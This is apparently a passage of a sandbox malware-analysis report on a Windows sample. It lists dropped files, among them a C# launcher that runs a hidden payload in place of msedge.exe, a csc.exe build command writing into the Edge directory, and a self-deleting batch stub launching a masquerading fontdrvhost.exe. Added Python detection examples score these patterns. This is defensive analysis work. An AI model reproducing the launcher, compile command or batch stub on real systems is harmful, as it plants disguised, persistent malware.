                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                Process:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                Process:C:\Recovery\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):847
                                                                                                                Entropy (8bit):5.354334472896228
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                Malicious:false
                                                                                                                Preview:@...e................................................@..........
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):398
                                                                                                                Entropy (8bit):5.046787756052235
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLKwPkSiFkD:JNVQIbSfhWLzIiFkMSfhX8DFkD
                                                                                                                MD5:BD6CC936C61D3B61D0D285C1DDCA0249
                                                                                                                SHA1:83531DA32C8E0072C4FC6FB8A1E010A918C55BEF
                                                                                                                SHA-256:47591028AE6A9BAEEF2CDD849A226ADC801AFE3E0127965D52B17241DC7695C6
                                                                                                                SHA-512:ABA95583D827B6E14B0C2BA0A36C57D84787B06A98039113A47222B3693CCF5EB5A2DC67888289EC982A909F80D7E95A52585F939CBE7DBE71AB9A061E65C2A5
                                                                                                                Malicious:false
                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"); } catch { } }).Start();. }.}.
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):268
                                                                                                                Entropy (8bit):5.109818860536846
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fzq49:Hu7L//TRRzscQnabF
                                                                                                                MD5:DC466C6A01D0752F79AACA68E953F314
                                                                                                                SHA1:4987E272355A0EA48C9ADA779DBC4F27BDAD584F
                                                                                                                SHA-256:452EB631D75C559F9A6217B443BE018571DED38BBC1F12C31D98BBD1CE93C3D6
                                                                                                                SHA-512:7978B54887DEF35783FB69A8D83CADA0073580117EC1F08BC08AE8D9CA5D4ECB048E69A96DF78C01C9DC07B7BD88A9B2B18D6F98705745463AB1FCB1F4118F91
                                                                                                                Malicious:true
                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs"
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with CRLF, CR line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):771
                                                                                                                Entropy (8bit):5.232800500161943
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:KOuI/un/VRzstnabgKax5DqBVKVrdFAMBJTH:yN/VRzPbgK2DcVKdBJj
                                                                                                                MD5:7A48A9C5BAC4CD2C18231BA90C524E36
                                                                                                                SHA1:F934F42C31194A31286D4E15ACD44D8782F23A3A
                                                                                                                SHA-256:9A47CADC3FDF9AD76B87A69C8B3642D27E57BD407C9C97CD7F87FA89074E9BF4
                                                                                                                SHA-512:D2327F708C1F8B1B6408BF8E360BC5F3E0297BAA6C2F5EEF1E6AEBE573CCCEF42D8C8BA037040E1CC0D24FCDCEFD530D8870B30C6D453881BDB5B7BB6BEFBAD5
                                                                                                                Malicious:false
                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
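The two entries above are the response file and the compiler's own echo for a csc.exe run that writes its output straight into the Edge installation directory as msedge.exe, built from a CodeDOM-style scratch source in the user's Temp folder. The dropped .cs source a few entries up shows what that binary is: a launcher that starts msedge.exe.exe (by its name, the displaced real browser) and the C:\Recovery payload in parallel, and a later cvtres.exe artifact shows a second compile staged under C:\Windows\System32. The following is an added triage example, not Joe Sandbox output and not code from the sample: it tokenises a csc.exe command line and scores it on where the output lands, because the Temp\<8 chars>\<8 chars>.0.cs source shape on its own is also what a benign PowerShell Add-Type compile produces. The benign command line used for contrast is constructed, and the heuristics and severity labels are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# A token is a run of non-blank text in which double-quoted segments (which may hold
# spaces) are glued to their neighbours, so /out:"C:\Program Files\x.exe" stays whole.
_TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
# Benign CodeDOM / PowerShell Add-Type compiles put source AND output here.
_USER_TEMP_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
# A compiler writing a fresh binary under these roots is the core signal.
_PROTECTED_RE = re.compile(r"^[a-z]:\\(?:program files(?: \(x86\))?|windows)\\", re.I)
# CodeDOM scratch naming: <8 chars>\<same 8 chars>.N.cs. On its own this is NOT
# malicious (Add-Type produces it too); it only says the code was generated at runtime.
_CODEDOM_SRC_RE = re.compile(r"\\([a-z0-9]{8})\\\1\.\d+\.cs$", re.I)


def tokenize(cmdline: str) -> List[str]:
    return [t.replace('"', "") for t in _TOKEN_RE.findall(cmdline)]


@dataclass
class CscFinding:
    out_path: Optional[str]
    target: Optional[str]
    sources: List[str]
    reasons: List[str] = field(default_factory=list)
    severity: str = "none"


def analyze_csc_cmdline(cmdline: str) -> CscFinding:
    toks = tokenize(cmdline)
    out_path: Optional[str] = None
    target: Optional[str] = None
    sources: List[str] = []
    for tok in toks[1:]:                       # toks[0] is csc.exe itself
        low = tok.lower()
        if low.startswith("/out:"):
            out_path = tok[len("/out:"):]
        elif low.startswith(("/t:", "/target:")):
            target = low.split(":", 1)[1]      # csc.exe honours the last one given
        elif low.endswith(".cs"):
            sources.append(tok)
    f = CscFinding(out_path, target, sources)

    protected = bool(out_path and _PROTECTED_RE.match(out_path))
    in_temp = bool(out_path and _USER_TEMP_RE.match(out_path))
    codedom = any(_CODEDOM_SRC_RE.search(s) for s in sources)
    builds_exe = target in ("exe", "winexe")

    if protected:
        f.reasons.append(f"output written into a protected directory: {out_path}")
    elif out_path and not in_temp:
        f.reasons.append(f"output outside the user's Temp directory: {out_path}")
    if codedom:
        f.reasons.append("source uses CodeDOM scratch naming (code generated at runtime)")
    if builds_exe:
        f.reasons.append(f"builds an executable (/target:{target}), not a library")

    # Severity is this example's own scale, not a Sigma level.
    if protected or (out_path and not in_temp and builds_exe and codedom):
        f.severity = "high"
    elif out_path and not in_temp:
        f.severity = "medium"
    elif codedom or builds_exe:
        f.severity = "low"
    return f


# Copied from the csc.exe invocation echoed in the report above; quoting as supplied.
REPORT_CSC = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output '
    r'/R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
    r'/out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" '
    r'/debug- /optimize+ /optimize+ /target:winexe /unsafe '
    r'"C:\Users\user\AppData\Local\Temp\4zgfavxt\4zgfavxt.0.cs"'
)
# Constructed benign contrast: the shape PowerShell Add-Type leaves behind.
BENIGN_CSC = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
    r'/R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\ab12cd34\ab12cd34.dll" '
    r'/debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ab12cd34\ab12cd34.0.cs"'
)

if __name__ == "__main__":
    for name, cmd in (("report", REPORT_CSC), ("benign", BENIGN_CSC)):
        f = analyze_csc_cmdline(cmd)
        print(f"{name}: severity={f.severity} out={f.out_path}")
        for r in f.reasons:
            print("   -", r)
```

Fed the report's command line, the function returns severity "high" on the strength of the /out path alone; the constructed Add-Type line returns "low", since its only signal is the scratch-file naming. In a real pipeline the command line would come from Sysmon Event ID 1 or 4688 records for csc.exe, and the output path should be joined against subsequent file-write and process-start events to confirm the planted binary was executed.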
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):25
                                                                                                                Entropy (8bit):4.323856189774723
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:qOIPUHon:Ueon
                                                                                                                MD5:D71252C3ADB5492C3451AA782E666C25
                                                                                                                SHA1:16C4BEC6FBF9CD59702C9AA69927B3C427DCF690
                                                                                                                SHA-256:C719E7F55E5BB27F531E9ABC01135C3E34A02AC8198353D91F08ED7ABC17F86F
                                                                                                                SHA-512:932B2DCDF3536BC789DDB56DE99C01255F4895C08959B1F49D35F78F28F56076E028CEF7D631845565B26D0D343569154FCC995470E7853303CD235FED2BBBD8
                                                                                                                Malicious:false
                                                                                                                Preview:SIXdwkDvaxh1bn6CmSgk0IT18
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):193
                                                                                                                Entropy (8bit):5.159385433581279
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:hCRLuVFOOr+DED+Ybd2DGKOZG1N723fNOEhn:CuVEOCDED+sdSa19
                                                                                                                MD5:90F67FD3A57490E6B853EA311B2B6004
                                                                                                                SHA1:C048BB20D7772DECCCED2A187B8A8F4782E626F6
                                                                                                                SHA-256:CDF98F4056D9AD2E4C569BE3C9A345657B0C3A310BA322A8004C6DACAC6376D8
                                                                                                                SHA-512:0FBF745114B9F8988FFC9A16FA065EA89941A1E91A5002CFD811E74BA69635E049B14B01B2E08E65628B086A8DB5CD6D0A490F4FBD4CA96E42875BE363197D5C
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Kg1DnkFEGg.bat"
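This batch file is the staging stub behind the report's "Uses ping.exe to sleep" and "Files With System Process Name In Unsuspected Locations" signatures: ping -n 10 against localhost stands in for a roughly nine-second delay without calling timeout.exe or sleep, fontdrvhost.exe (a System32 binary on a clean host) is launched from a Microsoft Office directory, and the script then deletes itself. The following is an added detection example, not Joe Sandbox code: it applies those three checks to batch-file text and treats a masqueraded system binary as sufficient on its own, with the delay/launch/self-delete sequence as the fallback pattern. The batch content is transcribed from the preview above (the report renders CRLF as ".."), the second script is constructed as a benign contrast, and the system-binary list is a short illustrative sample.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Binaries that live only in %SystemRoot%\System32 (or SysWOW64) on a clean host.
# Short illustrative sample for this example, not an exhaustive list.
SYSTEM_BINARIES = {
    "fontdrvhost.exe", "csrss.exe", "winlogon.exe", "lsass.exe", "svchost.exe",
    "dllhost.exe", "smss.exe", "wininit.exe", "spoolsv.exe", "conhost.exe",
}
_SYSTEM_DIR_RE = re.compile(r"^[a-z]:\\windows\\(?:system32|syswow64)\\[^\\]+$", re.I)

# ping -n N 127.0.0.1|localhost > nul : N echo requests one second apart, i.e. about
# an (N-1)-second delay that needs no sleep binary.
_PING_SLEEP_RE = re.compile(
    r"^\s*ping(?:\.exe)?\s+(?:-n\s+(\d+)\s+)?(?:127\.0\.0\.1|localhost|::1)\b.*>\s*nul",
    re.I)
# start ["title"] [/switches] "path" : capture the launched path.
_START_RE = re.compile(
    r'^\s*start\s+(?:"[^"]*"\s+)?(?:/\w+\s+)*"?([^"\r\n]+?\.(?:exe|bat|cmd|vbs|js|ps1))"?',
    re.I)
# del [/switches] "path" : capture the deleted path.
_DEL_RE = re.compile(r'^\s*del\b(?:\s+/[aqfsp]+)*\s+"?([^"\r\n]+?)"?\s*$', re.I)


def _norm(path: str) -> str:
    # cmd.exe tolerates doubled backslashes, so collapse them before comparing.
    return re.sub(r"\\{2,}", r"\\", path).strip().lower()


@dataclass
class BatchFinding:
    sleep_seconds: int = 0
    launched: List[str] = field(default_factory=list)
    masquerading: List[str] = field(default_factory=list)
    self_delete: bool = False
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.masquerading) or (
            self.sleep_seconds > 0 and bool(self.launched) and self.self_delete)


def analyze_batch(text: str, own_path: Optional[str] = None) -> BatchFinding:
    f = BatchFinding()
    for line in text.splitlines():
        m = _PING_SLEEP_RE.match(line)
        if m:
            n = int(m.group(1) or 4)            # ping sends 4 requests by default
            f.sleep_seconds += max(n - 1, 0)
            f.reasons.append(f"ping used as a {max(n - 1, 0)}s sleep")
            continue
        m = _START_RE.match(line)
        if m:
            path = m.group(1)
            f.launched.append(path)
            name = path.rsplit("\\", 1)[-1].lower()
            if name in SYSTEM_BINARIES and not _SYSTEM_DIR_RE.match(path):
                f.masquerading.append(path)
                f.reasons.append(f"{name} started from outside System32: {path}")
            continue
        m = _DEL_RE.match(line)
        if m:
            target = m.group(1)
            is_self = (_norm(target) == _norm(own_path)) if own_path \
                else target.lower().endswith((".bat", ".cmd"))
            if is_self:
                f.self_delete = True
                f.reasons.append("script deletes itself after launching the payload")
    return f


# Transcribed from the dropped-file preview above; the doubled backslash before
# Kg1DnkFEGg.bat is present in the original.
REPORT_BATCH = (
    "@echo off\r\n"
    "chcp 65001\r\n"
    "ping -n 10 localhost > nul\r\n"
    'start "" "C:\\Program Files\\Microsoft Office 15\\ClientX64\\fontdrvhost.exe"\r\n'
    'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\Kg1DnkFEGg.bat"'
)
# Constructed benign contrast: same delay idiom, but the binary runs from System32
# and the script does not remove itself.
BENIGN_BATCH = (
    "@echo off\r\n"
    "ping -n 3 127.0.0.1 > nul\r\n"
    'start "" "C:\\Windows\\System32\\fontdrvhost.exe"'
)

if __name__ == "__main__":
    f = analyze_batch(REPORT_BATCH, own_path=r"C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat")
    print("report batch suspicious:", f.suspicious)
    for r in f.reasons:
        print("   -", r)
    print("benign batch suspicious:", analyze_batch(BENIGN_BATCH).suspicious)
```

Note that the masquerade check compares against a fixed directory rather than a hash: the same fontdrvhost.exe name in C:\Program Files\Microsoft Office 15\ClientX64\ is the whole point, and the entry further down in this report confirms the dropped copy under that path is a separate, detected binary. Joining the launched path against the report's dropped-file hashes is the natural next step when scoring a real sample.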
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Mon Nov 18 09:39:04 2024, 1st section name ".debug$S"
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1932
                                                                                                                Entropy (8bit):4.600158688081864
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:H/EfW9JLzFfLBtbaHwhwKKjmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+5gcN:iaLzJC/KMmslmuulB+hnqXSfbNtmh5N
                                                                                                                MD5:4924E2745D26EC216DB839837FB6F637
                                                                                                                SHA1:A9E8EA1491CDDC49E8B58A52DD3FDE1D5D0829D5
                                                                                                                SHA-256:D9AB477684740B3783E84ACD3011F4245D9B7B35E4C97E38CDF7446FE3EA2FC8
                                                                                                                SHA-512:8B7AD0FBFF33BF8339091699FFB59BA06746E2316768B90B939FDE527B89CF74D15CE49054FC3AB8AFC790FECD0F8F4DCAE43B69FC3A538B1B0C06272F9FB99D
                                                                                                                Malicious:false
                                                                                                                Preview:L...8.;g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC80740084700441B098BDC166533478DB.TMP....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RES6584.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Mon Nov 18 09:39:05 2024, 1st section name ".debug$S"
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1956
                                                                                                                Entropy (8bit):4.556498128432225
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:HrO9GXOhtbaHxfwKKjmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:EimKMmEluOulajfqXSfbNtmh1Z
                                                                                                                MD5:8E8FADD1BF0379638FBF7FA2E95FDBB7
                                                                                                                SHA1:7E901AA9D3BE06EDC0D1EF281A06F7AC1D079B5C
                                                                                                                SHA-256:700F6EF192C5319573556CF0EDF711547719D693BB02D07F971DDF5550A5643F
                                                                                                                SHA-512:805C5C926EEDA2801F898F18D26053EBE6CC21D0F43B8185173A1E1585D6C02DEAE3D4BA4AF0E1FA0D906D14A92704A5AD7BC6CFFE5CED274B9E6FC5C9A0D8DB
                                                                                                                Malicious:false
                                                                                                                Preview:L...9.;g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........<....c:\Windows\System32\CSC7E7B7A5EED54F4581A1AD8A9D40FA45.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RES6A18.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
